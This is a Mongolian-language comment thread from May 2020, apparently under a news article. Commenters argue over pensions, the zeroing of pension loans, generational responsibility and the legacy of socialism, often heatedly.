Tor zasag bolomjit arga hemjeenuud avaad l baihad oilgodoggui, zovhon toroos avahiin toloo tetgever nem gej shaardlaga tavij bgaa ni denduu davarsan uildel bish uu. Baga bolovch yum ogood bgaan bish uu. ter nehed bgaa mongiig chini ajil hiij bgaa humuusiin tsalingaas avsan tatvar sh dee. Yumiig dalmiduulan shunal ni hodloh yumaa. Buh hun tetgeveriinhnii mongoor amidraagui baih. Niited hamaatuulah hereggui. Aav eejeeree tejeelgej amidardag ajilgui zaluus olon sh dee.
тэтгэвэр тэглэсэн нь алдаа байсан. [103.26.193.226] 2020-05-08 03:42:12
Тэтгэвэр тэглэж 900 тэрбум төг үгүй болсон. Тэтгэвэр хэзээ ч ялгаатай байдаг юм шүү дээ.0гт ажил хийгээгүй эсвэл бага цалинтай алдаг хоног хиыж байсан хүмүүс бага тэтгэвэр авдаг юм.30 жил уурхайд ажилсан 30-40 жил эмнэлэг сургууль 25 дээш жил цагдаа цэрэг хүчний байгууллагд ажиллаж тэтгэвэр тогтоолгосон хүмүүс арай илүү байдаг тэтгэвэр хэзээ ч тэгштгэж болдоггүй учир нь эндээ байдаг энэ хүмүүс нийгмийн даатгалаа тасралтгүй 25-40 өгсөн юм.х
zochin [202.9.46.217] 2020-05-08 00:35:49
turd shurgalsan khulgaich deeremchid urvagchdiin tuiliin gol zorilogo ni ard irgediig yaduu tarchig b.lgaj zakhirakh gesen adgiin muu bodlogiin ur dun.
Зочин [66.181.188.59] 2020-05-08 00:17:45
Үйлийн үр л дээ. Өөрсдөө залуудаа хүүхдийнхээ боловсрол, төлөвшил, хүмүүжилд хангалттай анхаараагүй, сайн үлгэрлээгүй, цаг гаргаагүй хүмүүс амжилтгүй, бүтэлгүй хүүхэдтэй байгаа юм.
Зочин [202.126.89.71] 2020-05-09 03:00:52
Болдлын хулгайчид: би хулгайч биш. Соц үед төрж өссөн 40 настай эмэгтэй. Одоо ажил хийгээд, аав ээждээ нэмэр болоод явж байна. Тэтгэврээс нь авч хэзээ ч үзээгүйн дээр өвдөх хавдах бүх юмыг нь хариуцдаг. Аав ээж маань улсад насаараа ажиллахын зэрэгцээ 4 хүүхдээ хүмүүжилтэй, боловсролтой болгоход их анхаарсан. Би 2 дээд сургууль төгссөн, 1 нь гадаадад, өөрөө тэтгэлэг олсон. Одоо 9 .5 саяын цалинтай ажил хийдэг. Ээж аавын минь ач.
zochin [202.126.89.23] 2020-05-08 04:42:51
Barag l vnen shvv turvvllee. Usguluu odoo boloo .odoo uursdiiguu bodotsgoo ahmaduudaa hvvhdeesee avahgvi ali alindaa gai bolohgvi l baival boloo sh de
Зочин [202.126.89.232] 2020-05-08 01:12:32
Санал нэг бн. Социализм гэр бүлийг сүйтгэж хуурамч лоозонгоор амьдруулсан. Одоо үр хүүхдүүд нь болохгүй бүхнийг хийнэ. Буруутан нь хэзээ ч өөрөө биш . Буруу болгон бусдынх!!!
БОДЛЫН ХУЛГАЙЧ [66.181.167.53] 2020-05-08 00:42:35
ЭНЭ БАС НЭГ ХУЛГАЙЧ БАЙХ. ТЭР ҮЕ ӨНӨӨДӨР ХОЁР ЧИНЬ ОГТ ӨӨР НИЙГЭМ БАЙСИЙН. ОЛГОЙ ТОЛГОЙТ МИНЬ.